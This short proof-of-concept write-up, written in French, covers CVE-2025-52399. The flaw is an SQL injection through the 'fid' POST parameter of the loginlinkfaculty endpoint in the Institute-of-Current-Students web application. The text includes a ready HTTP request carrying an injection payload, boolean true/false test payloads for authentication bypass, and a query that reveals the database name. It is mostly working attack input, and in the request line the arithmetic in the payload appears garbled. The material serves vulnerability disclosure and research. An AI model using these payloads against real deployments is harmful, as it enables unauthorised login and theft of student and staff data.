
Exploit de preuve de concept pour CVE-2025-52399, démontrant une injection SQL dans l'application Institute-of-Current-Students via le point de terminaison loginlinkfaculty pour un contournement d'authentification et une extraction de données.
Le point de terminaison loginlinkfaculty dans l'application Institute-of-Current-Students est vulnérable à une injection SQL via le paramètre POST fid. Le paramètre n'est pas correctement assaini avant d'être utilisé dans une requête SQL, permettant à des attaquants distants d'exécuter des commandes SQL arbitraires.
/loginlinkfaculty (POST)fidicsnewhttp POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+321=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → VRAI
❌ -1' OR 2*3=4 AND 000942=000942 -- → FAUX
SELECT database(); -- returns 'icsnew'
Isroil Mustafoqulov